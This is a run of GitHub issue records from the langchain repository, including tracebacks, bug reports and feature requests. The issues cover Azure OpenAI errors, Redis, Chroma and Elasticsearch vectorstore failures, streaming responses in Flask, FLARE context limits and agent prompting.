return self(kwargs)[self.output_keys[0]]
^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\base.py", line 116, in __call__
raise e
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\base.py", line 113, in __call__
outputs = self._call(inputs)
^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\combine_documents\base.py", line 75, in _call
output, extra_return_dict = self.combine_docs(docs, **other_keys)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\combine_documents\map_reduce.py", line 139, in combine_docs
results = self.llm_chain.apply(
^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\llm.py", line 118, in apply
response = self.generate(input_list)
^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\llm.py", line 62, in generate
return self.llm.generate_prompt(prompts, stop)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\llms\base.py", line 107, in generate_prompt
return self.generate(prompt_strings, stop=stop)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\llms\base.py", line 140, in generate
raise e
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\llms\base.py", line 137, in generate
output = self._generate(prompts, stop=stop)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\llms\openai.py", line 297, in _generate
response = completion_with_retry(self, prompt=_prompts, **params)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\llms\openai.py", line 102, in completion_with_retry
return _completion_with_retry(**kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\tenacity\__init__.py", line 289, in wrapped_f
return self(f, *args, **kw)
^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\tenacity\__init__.py", line 379, in __call__
do = self.iter(retry_state=retry_state)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\tenacity\__init__.py", line 314, in iter
return fut.result()
^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\concurrent\futures\_base.py", line 449, in result
return self.__get_result()
^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\concurrent\futures\_base.py", line 401, in __get_result
raise self._exception
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\tenacity\__init__.py", line 382, in __call__
result = fn(*args, **kwargs)
^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\llms\openai.py", line 100, in _completion_with_retry
return llm.client.create(**kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\openai\api_resources\completion.py", line 25, in create
return super().create(*args, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\openai\api_resources\abstract\engine_api_resource.py", line 153, in create
response, _, api_key = requestor.request(
^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\openai\api_requestor.py", line 226, in request
resp, got_stream = self._interpret_response(result, stream)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\openai\api_requestor.py", line 620, in _interpret_response
self._interpret_response_line(
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\openai\api_requestor.py", line 683, in _interpret_response_line
raise self.handle_error_response(
openai.error.InvalidRequestError: Resource not found
### Suggestion:
_No response_ | Issue: RetrievalQA is not working with AzureOpenAI LLM model | https://api.github.com/repos/langchain-ai/langchain/issues/4966/comments | 2 | 2023-05-19T06:12:01Z | 2023-05-20T09:06:11Z | https://github.com/langchain-ai/langchain/issues/4966 | 1,716,680,713 | 4,966 |
[
"hwchase17",
"langchain"
]
| ### Feature request
support for kotlin language
### Motivation
1.Safety and Reliability: Kotlin emphasizes on safety and reliability, and it can help developers avoid common programming errors through type checks, null safety, exception handling, and other mechanisms. Additionally, Kotlin provides a functional programming style that reduces side effects and improves code reliability and maintainability.
2.Interoperability: Kotlin seamlessly interoperates with Java, which means that you can use existing Java libraries and frameworks in Kotlin projects, and Kotlin code can be used in Java projects. Moreover, Kotlin supports JavaScript and Native platforms, so you can use the same code across different platforms.
3.Conciseness: Kotlin has a concise and clear syntax that reduces code redundancy and complexity. For example, Kotlin uses lambda expressions and extension functions to simplify code, and provides many convenient syntax sugars such as null safety operator, range expressions, string templates, etc. These features can greatly improve development efficiency and reduce the possibility of errors.
### Your contribution
I can write any partial code related to Kotlin. | Is it possible to support the kotlin language?Like langchainkt. | https://api.github.com/repos/langchain-ai/langchain/issues/4963/comments | 7 | 2023-05-19T05:34:35Z | 2024-06-15T14:01:51Z | https://github.com/langchain-ai/langchain/issues/4963 | 1,716,644,366 | 4,963 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
In the doc as mentioned below:-
https://python.langchain.com/en/latest/modules/chains/examples/llm_summarization_checker.html
Assumptions is misspelled as assumtions.
### Idea or request for content:
Fix the misspelling in the doc markdown. | DOC: Misspelling in LLMSummarizationCheckerChain documentation | https://api.github.com/repos/langchain-ai/langchain/issues/4959/comments | 1 | 2023-05-19T04:45:16Z | 2023-09-10T16:15:26Z | https://github.com/langchain-ai/langchain/issues/4959 | 1,716,598,909 | 4,959 |
[
"hwchase17",
"langchain"
]
| ### Feature request
- Neo4j
[Neo4j](https://github.com/neo4j/neo4j)
- langchain2neo4j
[langchain2neo4j](https://github.com/tomasonjo/langchain2neo4j)
- langchain2ongdb
[langchain2ongdb](https://github.com/ongdb-contrib/langchain2ongdb)
### Motivation
We are building some question answering tools based on the knowledge graph and it would be convenient to have some open libraries based on Neo4j.
### Your contribution
I'm trying to make a contribution:) | Consider adding the default Neo4jDatabaseChain tool to the Chains component | https://api.github.com/repos/langchain-ai/langchain/issues/4957/comments | 1 | 2023-05-19T03:33:24Z | 2023-06-08T00:41:58Z | https://github.com/langchain-ai/langchain/issues/4957 | 1,716,553,534 | 4,957 |
[
"hwchase17",
"langchain"
]
I am trying out the Custom Agent with Tool Retrieval example. Sometimes (not always) the Agent Executor returns the answer itself in the Action Input. The inconsistency makes things even worse.
For example: I have a Small Talk Tool that is in charge of answering casual conversation from the user. I have given a profile to my agent (name: Sam). Here is one of the scenarios I got:
**Question**: Hello I am Bob, what is your name?
**Thought**: The user is initiating a small talk conversation
**Action Input**: Hi Bob, I am Sam, your personal assistant. How can I assist you today?
**Observation**: As an AI language model, I don't need any assistance, Sam. But thank you for asking! How about you? Is there anything I can help you with?
So the expected response by the agent became the action input, which in the end produced another response that doesn't make sense at all. The same happens with other tools as well, such as querying content from the vectorstore.
### Suggestion:
Is there a way to restrict the action input to just the user question, instead of allowing the agent to answer it and modify the initial context?
Whether via the prompt or the temperature, I'm open to any advice. Thanks!
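One direction I'm considering (my own guess, not something from the docs) is tightening the ReAct format section of the agent's prompt so the model is told never to put an answer there:

```python
# assumption: the custom agent's prompt exposes the standard ReAct format section
format_instructions = """Use the following format:

Question: the input question you must answer
Thought: you should always think about what to do
Action: the action to take, should be one of [{tool_names}]
Action Input: ONLY the raw input to pass to the tool, never your own answer
Observation: the result of the action
... (this Thought/Action/Action Input/Observation can repeat N times)
Thought: I now know the final answer
Final Answer: the final answer to the original input question"""
```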
| Issue: Agent Executor tends to answer user question directly and set it as Action Input during the iterative thought process. | https://api.github.com/repos/langchain-ai/langchain/issues/4955/comments | 4 | 2023-05-19T02:34:55Z | 2023-09-27T16:07:00Z | https://github.com/langchain-ai/langchain/issues/4955 | 1,716,519,016 | 4,955 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain version: 0.0.173
Redis version: 4.5.5
Python version: 3.11
OS: Windows 10
### Who can help?
@hwchase17 @agola11
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Using the latest langchain with the Redis vectorstore returns a TypeError.
code here:
```
embeddings = OpenAIEmbeddings(model="text-embedding-ada-002", chunk_size=1)
rds = Redis.from_texts(texts, embeddings, redis_url="redis://localhost:6379", index_name=uid)
```
error stack:
```
---------------------------------------------------------------------------
IndexError Traceback (most recent call last)
File D:\Projects\openai\venv\Lib\site-packages\redis\connection.py:1450, in ConnectionPool.get_connection(self, command_name, *keys, **options)
1449 try:
-> 1450 connection = self._available_connections.pop()
1451 except IndexError:
IndexError: pop from empty list
During handling of the above exception, another exception occurred:
TypeError Traceback (most recent call last)
Cell In[5], line 11
8 print("create vector store with id: {}".format(uid))
10 embeddings = OpenAIEmbeddings(model="text-embedding-ada-002", chunk_size=1)
---> 11 rds = Redis.from_texts(texts, embeddings, redis_url = "redis://localhost:6379",index_name=uid)
File D:\Projects\openai\venv\Lib\site-packages\langchain\vectorstores\redis.py:448, in Redis.from_texts(cls, texts, embedding, metadatas, index_name, content_key, metadata_key, vector_key, **kwargs)
419 @classmethod
420 def from_texts(
421 cls: Type[Redis],
(...)
429 **kwargs: Any,
430 ) -> Redis:
431 """Create a Redis vectorstore from raw documents.
432 This is a user-friendly interface that:
433 1. Embeds documents.
(...)
446 )
447 """
--> 448 instance, _ = cls.from_texts_return_keys(
449 texts=texts,
450 embedding=embedding,
451 metadatas=metadatas,
452 index_name=index_name,
453 content_key=content_key,
454 metadata_key=metadata_key,
455 vector_key=vector_key,
456 kwargs=kwargs,
457 )
458 return instance
File D:\Projects\openai\venv\Lib\site-packages\langchain\vectorstores\redis.py:399, in Redis.from_texts_return_keys(cls, texts, embedding, metadatas, index_name, content_key, metadata_key, vector_key, distance_metric, **kwargs)
396 index_name = uuid.uuid4().hex
398 # Create instance
--> 399 instance = cls(
400 redis_url=redis_url,
401 index_name=index_name,
402 embedding_function=embedding.embed_query,
403 content_key=content_key,
404 metadata_key=metadata_key,
405 vector_key=vector_key,
406 **kwargs,
407 )
409 # Create embeddings over documents
410 embeddings = embedding.embed_documents(texts)
File D:\Projects\openai\venv\Lib\site-packages\langchain\vectorstores\redis.py:138, in Redis.__init__(self, redis_url, index_name, embedding_function, content_key, metadata_key, vector_key, relevance_score_fn, **kwargs)
136 redis_client = redis.from_url(redis_url, **kwargs)
137 # check if redis has redisearch module installed
--> 138 _check_redis_module_exist(redis_client, REDIS_REQUIRED_MODULES)
139 except ValueError as e:
140 raise ValueError(f"Redis failed to connect: {e}")
File D:\Projects\openai\venv\Lib\site-packages\langchain\vectorstores\redis.py:48, in _check_redis_module_exist(client, required_modules)
46 def _check_redis_module_exist(client: RedisType, required_modules: List[dict]) -> None:
47 """Check if the correct Redis modules are installed."""
---> 48 installed_modules = client.module_list()
49 installed_modules = {
50 module[b"name"].decode("utf-8"): module for module in installed_modules
51 }
52 for module in required_modules:
File D:\Projects\openai\venv\Lib\site-packages\redis\commands\core.py:5781, in ModuleCommands.module_list(self)
5774 def module_list(self) -> ResponseT:
5775 """
5776 Returns a list of dictionaries containing the name and version of
5777 all loaded modules.
5778
5779 For more information see https://redis.io/commands/module-list
5780 """
-> 5781 return self.execute_command("MODULE LIST")
File D:\Projects\openai\venv\Lib\site-packages\redis\client.py:1266, in Redis.execute_command(self, *args, **options)
1264 pool = self.connection_pool
1265 command_name = args[0]
-> 1266 conn = self.connection or pool.get_connection(command_name, **options)
1268 try:
1269 return conn.retry.call_with_retry(
1270 lambda: self._send_command_parse_response(
1271 conn, command_name, *args, **options
1272 ),
1273 lambda error: self._disconnect_raise(conn, error),
1274 )
File D:\Projects\openai\venv\Lib\site-packages\redis\connection.py:1452, in ConnectionPool.get_connection(self, command_name, *keys, **options)
1450 connection = self._available_connections.pop()
1451 except IndexError:
-> 1452 connection = self.make_connection()
1453 self._in_use_connections.add(connection)
1455 try:
1456 # ensure this connection is connected to Redis
File D:\Projects\openai\venv\Lib\site-packages\redis\connection.py:1492, in ConnectionPool.make_connection(self)
1490 raise ConnectionError("Too many connections")
1491 self._created_connections += 1
-> 1492 return self.connection_class(**self.connection_kwargs)
File D:\Projects\openai\venv\Lib\site-packages\redis\connection.py:956, in Connection.__init__(self, host, port, socket_timeout, socket_connect_timeout, socket_keepalive, socket_keepalive_options, socket_type, **kwargs)
954 self.socket_keepalive_options = socket_keepalive_options or {}
955 self.socket_type = socket_type
--> 956 super().__init__(**kwargs)
TypeError: AbstractConnection.__init__() got an unexpected keyword argument 'kwargs'
```
### Expected behavior
I followed the instructions in the documentation and it ran fine before, but when I upgraded the langchain version to the latest version, it failed.
I believe this is related to https://github.com/hwchase17/langchain/pull/4857; the traceback above shows `from_texts` passing `kwargs=kwargs` into `from_texts_return_keys` instead of unpacking it with `**kwargs`. Am I using this method incorrectly now? I'm new to langchain. | vectorstore redis return TypeError | https://api.github.com/repos/langchain-ai/langchain/issues/4952/comments | 16 | 2023-05-19T00:53:22Z | 2023-12-12T16:31:54Z | https://github.com/langchain-ai/langchain/issues/4952 | 1,716,453,446 | 4,952 |
[
"hwchase17",
"langchain"
]
| ## Question
I'm interested in creating a conversational app using RetrievalQA that can also answer using external knowledge. However, I'm curious whether RetrievalQA supports replying in a streaming manner. I couldn't find any related articles, so I would like to ask everyone here. | Issue: Does RetrievalQA Support Streaming Replies? | https://api.github.com/repos/langchain-ai/langchain/issues/4950/comments | 30 | 2023-05-19T00:13:39Z | 2024-08-05T11:55:14Z | https://github.com/langchain-ai/langchain/issues/4950 | 1,716,429,367 | 4,950 |
[
"hwchase17",
"langchain"
]
| ### System Info
Colab standard Python 3 backend
### Who can help?
@O-Roma
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. Open GraphQL example notebook in colab
2. Add langchain and openai to the pip install statement
3. add environment variable for OPENAI_API_KEY
4. Run the notebook
Got the following error
```
ValidationError: 3 validation errors for GraphQLAPIWrapper
gql_client
field required (type=value_error.missing)
gql_function
field required (type=value_error.missing)
__root__
Could not import gql python package. Please install it with `pip install gql`. (type=value_error)
```
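Presumably the notebook's install cell also needs `gql` (a guess based on the last line of the error above):

```python
%pip install langchain openai gql
```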
### Expected behavior
The example should probably work. | GraphQL example notebook not working | https://api.github.com/repos/langchain-ai/langchain/issues/4946/comments | 4 | 2023-05-18T21:46:51Z | 2023-09-12T17:06:03Z | https://github.com/langchain-ai/langchain/issues/4946 | 1,716,309,110 | 4,946 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am using a Python Flask app for chat over data. In the console I get a streamable response directly from OpenAI, since I can enable streaming with the flag streaming=True.
The problem is that I can't "forward" the stream, or "show" the stream, in my API call.
Code for processing OpenAI and the chain is:
```
def askQuestion(self, collection_id, question):
collection_name = "collection-" + str(collection_id)
self.llm = ChatOpenAI(model_name=self.model_name, temperature=self.temperature, openai_api_key=os.environ.get('OPENAI_API_KEY'), streaming=True, callback_manager=CallbackManager([StreamingStdOutCallbackHandler()]))
self.memory = ConversationBufferMemory(memory_key="chat_history", return_messages=True, output_key='answer')
chroma_Vectorstore = Chroma(collection_name=collection_name, embedding_function=self.embeddingsOpenAi, client=self.chroma_client)
self.chain = ConversationalRetrievalChain.from_llm(self.llm, chroma_Vectorstore.as_retriever(similarity_search_with_score=True),
return_source_documents=True,verbose=VERBOSE,
memory=self.memory)
result = self.chain({"question": question})
res_dict = {
"answer": result["answer"],
}
res_dict["source_documents"] = []
for source in result["source_documents"]:
res_dict["source_documents"].append({
"page_content": source.page_content,
"metadata": source.metadata
})
    return res_dict
```
and the API route code:
```
def stream(collection_id, question):
completion = document_thread.askQuestion(collection_id, question)
for line in completion:
yield 'data: %s\n\n' % line
@app.route("/collection/<int:collection_id>/ask_question", methods=["POST"])
@stream_with_context
def ask_question(collection_id):
question = request.form["question"]
# response_generator = document_thread.askQuestion(collection_id, question)
# return jsonify(response_generator)
def stream(question):
completion = document_thread.askQuestion(collection_id, question)
for line in completion['answer']:
yield line
return Response(stream(question), mimetype='text/event-stream')
```
I am testing my endpoint with curl, passing the -N flag, so I should get a streamed response if one is possible.
When I make the API call, the endpoint first waits while the data is processed (I can see the streamed answer in my VS Code terminal), and only when it has finished do I get everything displayed in one go.
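For completeness, one pattern that might bridge the gap is a queue-backed callback handler (a sketch; the `callbacks` plumbing into `askQuestion` is my assumption):

```python
import queue
import threading

from langchain.callbacks.base import BaseCallbackHandler

class QueueCallbackHandler(BaseCallbackHandler):
    """Put every streamed token on a queue so the Flask view can yield it."""

    def __init__(self, q: queue.Queue):
        self.q = q

    def on_llm_new_token(self, token: str, **kwargs) -> None:
        self.q.put(token)

def stream_answer(document_thread, collection_id, question):
    q = queue.Queue()
    job_done = object()  # sentinel marking the end of the stream

    def task():
        # assumption: askQuestion is changed to forward callbacks to ChatOpenAI
        document_thread.askQuestion(collection_id, question,
                                    callbacks=[QueueCallbackHandler(q)])
        q.put(job_done)

    threading.Thread(target=task).start()
    while True:
        token = q.get()
        if token is job_done:
            return
        yield token
```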
Thanks
### Suggestion:
_No response_ | Issue: Stream a response from LangChain's OpenAI with Pyton Flask API | https://api.github.com/repos/langchain-ai/langchain/issues/4945/comments | 30 | 2023-05-18T21:41:40Z | 2024-03-07T21:26:59Z | https://github.com/langchain-ai/langchain/issues/4945 | 1,716,304,777 | 4,945 |
[
"hwchase17",
"langchain"
]
| ### System Info
0.1173
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1: Create Chroma vectorstore
2: Persist vectorstore
3: Use vectorstore once
4: Vectorstore no longer works, says "Index not found"
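Concretely, the pattern I assume steps 1-3 map to is roughly the following (a sketch; `docs` and `embeddings` are placeholders, and treating step 4 as a reload is my reading):

```python
from langchain.vectorstores import Chroma

# steps 1-2: create and persist
db = Chroma.from_documents(docs, embeddings, persist_directory="./chroma_db")
db.persist()

# step 3: use it once
db.similarity_search("some query")

# step 4: the next use (shown here as a reload) is where "Index not found" appears
db = Chroma(persist_directory="./chroma_db", embedding_function=embeddings)
db.similarity_search("some query")
```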
### Expected behavior
It works. | False "Index not found" messages | https://api.github.com/repos/langchain-ai/langchain/issues/4944/comments | 8 | 2023-05-18T21:10:59Z | 2023-09-19T16:10:07Z | https://github.com/langchain-ai/langchain/issues/4944 | 1,716,269,896 | 4,944 |
[
"hwchase17",
"langchain"
]
| ### Feature request
FLARE is providing some more accurate output when it works. I would love to switch to it. However, I do find that it often breaches the 4k context length.
I still don't have GPT4 access because I am a pleb (approve me plz OpenAI).
The stuff / map-reduce / refine chains used in the retrieval QandA would be great here. The FLARE chain looks like it is doing something akin to the "stuff" chain by just concatenating all the documents it found.
It would be nice if the LLMCombine chain was optional and defaulted to "stuff" like the retrieval chains do. This could be an option to handle context window issues when using FLARE. Ideally the same API would be followed, where users just pass the "chain_type" kwarg.
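Something like the following, purely as a hypothetical API that mirrors the retrieval chains (the `chain_type` kwarg does not exist on `FlareChain` today):

```python
from langchain.chains import FlareChain

flare = FlareChain.from_llm(
    llm,
    retriever=retriever,
    chain_type="map_reduce",  # hypothetical kwarg, mirroring RetrievalQA.from_chain_type
)
```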
The 4k context window is unfortunately making FLARE unworkable.
P.S. also interested in seeing if sources could be added to FLARE.
### Motivation
I want to switch my retrieval chain to be FLARE based (ideally with sources in the future). However, the context window limitations are making it unworkable at the moment. I am not even using chat_history.
### Your contribution
Happy to work with someone on this to raise a PR. | FLARE | Add CombineChain to handle long context | https://api.github.com/repos/langchain-ai/langchain/issues/4943/comments | 3 | 2023-05-18T20:04:50Z | 2023-09-15T16:12:36Z | https://github.com/langchain-ai/langchain/issues/4943 | 1,716,194,737 | 4,943 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain version 0.0.162
python: 3.10
All my .eml email files are 4.99 GB in total. The number of documents generated is 5,900,000, and around 7 million tokens are generated.
I have 2 questions:
1) Since the documents contain simple plain text, why are so many tokens generated? I mean, 7 million tokens :/
2) What can I do to reduce the number of tokens? Will data sampling help? Should I index in batches of 1000? (A sketch of the batching idea follows the code below.)
code:
```
print('loading docs from directory ...')
loader = DirectoryLoader('./test2',loader_cls=UnstructuredEmailLoader)
raw_documents = loader.load()
print('loaded docs with length')
#Splitting documents into chunks
text_splitter = RecursiveCharacterTextSplitter(
chunk_size=1000,
chunk_overlap=200,
)
documents = text_splitter.split_documents(raw_documents)
# Changing source to point to the original document
for x in documents:
x.page_content = x.page_content.replace("\n\n", " ")
x.page_content = x.page_content.replace("\n", " ")
x.metadata["source"] = x.metadata["source"].replace("test\\", "")
x.metadata["source"] = x.metadata["source"].replace("semails\\", "")
x.metadata["source"] = x.metadata["source"].replace("test2\\", "")
print(x)
# Creating index and saving it to disk
print("Creating index")
print("length of documents: "+str(len(documents)))
db = FAISS.from_documents(documents, embeddings )
print("Index created, saving to disk")
db.save_local("./index")
```
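Regarding question 2, the batching idea would look roughly like this (a sketch; `merge_from` is my reading of the FAISS wrapper API):

```python
batch_size = 1000
db = None
for i in range(0, len(documents), batch_size):
    batch = documents[i:i + batch_size]
    partial = FAISS.from_documents(batch, embeddings)
    if db is None:
        db = partial
    else:
        db.merge_from(partial)  # assumption: merges the partial index into db
db.save_local("./index")
```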
### Who can help?
@hwchase17
@vowelparrot
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
-
### Expected behavior
The token count should not be more than a million. | loading .eml Email files of 5 GB as documents generating large number of tokens (7 million) on index creation | https://api.github.com/repos/langchain-ai/langchain/issues/4942/comments | 1 | 2023-05-18T18:54:10Z | 2023-09-10T16:15:38Z | https://github.com/langchain-ai/langchain/issues/4942 | 1,716,110,918 | 4,942 |
[
"hwchase17",
"langchain"
]
| ### System Info
While loading an already existing index of OpenAI embeddings (data indexed using the Haystack framework):
```python
elastic_vector_search = ElasticVectorSearch(
elasticsearch_url=es_url,
index_name=index,
embedding=embeddings
)
```
Running the below command
```python
elastic_vector_search.similarity_search(query)
```
gives the below error
```python
---------------------------------------------------------------------------
BadRequestError Traceback (most recent call last)
Cell In[88], line 2
1 query = "adnoc distribution"
----> 2 elastic_vector_search.similarity_search(query)
File /opt/homebrew/Caskroom/miniforge/base/envs/langchain/lib/python3.11/site-packages/langchain/vectorstores/elastic_vector_search.py:206, in ElasticVectorSearch.similarity_search(self, query, k, filter, **kwargs)
194 def similarity_search(
195 self, query: str, k: int = 4, filter: Optional[dict] = None, **kwargs: Any
196 ) -> List[Document]:
197 """Return docs most similar to query.
198
199 Args:
(...)
204 List of Documents most similar to the query.
205 """
--> 206 docs_and_scores = self.similarity_search_with_score(query, k, filter=filter)
207 documents = [d[0] for d in docs_and_scores]
208 return documents
File /opt/homebrew/Caskroom/miniforge/base/envs/langchain/lib/python3.11/site-packages/langchain/vectorstores/elastic_vector_search.py:222, in ElasticVectorSearch.similarity_search_with_score(self, query, k, filter, **kwargs)
220 embedding = self.embedding.embed_query(query)
221 script_query = _default_script_query(embedding, filter)
--> 222 response = self.client.search(index=self.index_name, query=script_query, size=k)
223 hits = [hit for hit in response["hits"]["hits"]]
224 docs_and_scores = [
225 (
226 Document(
(...)
232 for hit in hits
233 ]
File /opt/homebrew/Caskroom/miniforge/base/envs/langchain/lib/python3.11/site-packages/elasticsearch/_sync/client/utils.py:414, in _rewrite_parameters.<locals>.wrapper.<locals>.wrapped(*args, **kwargs)
411 except KeyError:
412 pass
--> 414 return api(*args, **kwargs)
File /opt/homebrew/Caskroom/miniforge/base/envs/langchain/lib/python3.11/site-packages/elasticsearch/_sync/client/__init__.py:3857, in Elasticsearch.search(self, index, aggregations, aggs, allow_no_indices, allow_partial_search_results, analyze_wildcard, analyzer, batched_reduce_size, ccs_minimize_roundtrips, collapse, default_operator, df, docvalue_fields, error_trace, expand_wildcards, explain, ext, fields, filter_path, from_, highlight, human, ignore_throttled, ignore_unavailable, indices_boost, knn, lenient, max_concurrent_shard_requests, min_compatible_shard_node, min_score, pit, post_filter, pre_filter_shard_size, preference, pretty, profile, q, query, request_cache, rescore, rest_total_hits_as_int, routing, runtime_mappings, script_fields, scroll, search_after, search_type, seq_no_primary_term, size, slice, sort, source, source_excludes, source_includes, stats, stored_fields, suggest, suggest_field, suggest_mode, suggest_size, suggest_text, terminate_after, timeout, track_scores, track_total_hits, typed_keys, version)
3855 if __body is not None:
3856 __headers["content-type"] = "application/json"
-> 3857 return self.perform_request( # type: ignore[return-value]
3858 "POST", __path, params=__query, headers=__headers, body=__body
3859 )
File /opt/homebrew/Caskroom/miniforge/base/envs/langchain/lib/python3.11/site-packages/elasticsearch/_sync/client/_base.py:320, in BaseClient.perform_request(self, method, path, params, headers, body)
317 except (ValueError, KeyError, TypeError):
318 pass
--> 320 raise HTTP_EXCEPTIONS.get(meta.status, ApiError)(
321 message=message, meta=meta, body=resp_body
322 )
324 # 'X-Elastic-Product: Elasticsearch' should be on every 2XX response.
325 if not self._verified_elasticsearch:
326 # If the header is set we mark the server as verified.
BadRequestError: BadRequestError(400, 'search_phase_execution_exception', 'runtime error')
```
If an index with embeddings (in this case OpenAI) was not created using LangChain, can it not be loaded as a vector store?
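As a guess at the cause: `ElasticVectorSearch` builds a script-score query that assumes each document carries a dense-vector field named `vector`, so an index written by another framework (Haystack stores embeddings under a different field name) makes that script fail at search time. Roughly the shape LangChain issues:

```python
# Approximate shape of the internal script-score query; the hard-coded
# 'vector' field name is the assumption that breaks on foreign indexes.
script_query = {
    "script_score": {
        "query": {"match_all": {}},
        "script": {
            "source": "cosineSimilarity(params.query_vector, 'vector') + 1.0",
            "params": {"query_vector": embedding},
        },
    }
}
```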
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Run the steps shown earlier
### Expected behavior
Even though we did not create the Elasticsearch index using LangChain, an existing index with vector embeddings should be able to load. | Error while loading saved index in Elasticsearch | https://api.github.com/repos/langchain-ai/langchain/issues/4940/comments | 1 | 2023-05-18T17:34:22Z | 2023-09-15T22:12:58Z | https://github.com/langchain-ai/langchain/issues/4940 | 1,716,005,900 | 4,940 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
The author of the issue/PR cannot add a label to it.
Of course, some labels should be accessible only with high privilege (like `bug`(?), `close`), but some should be accessible to everybody, like `agent`, `chains`, and `documentation`.
Labels are a powerful tool for filtering issues/PRs, but they are not accessible to issue authors.
### Suggestion:
Allow most `labels` to be used by everybody in `Issues`/`pull requests`. | Issue: Filling an issue or PR with `label(s)` | https://api.github.com/repos/langchain-ai/langchain/issues/4934/comments | 3 | 2023-05-18T16:09:57Z | 2023-08-31T17:08:05Z | https://github.com/langchain-ai/langchain/issues/4934 | 1,715,894,918 | 4,934 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain-0.0.173
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
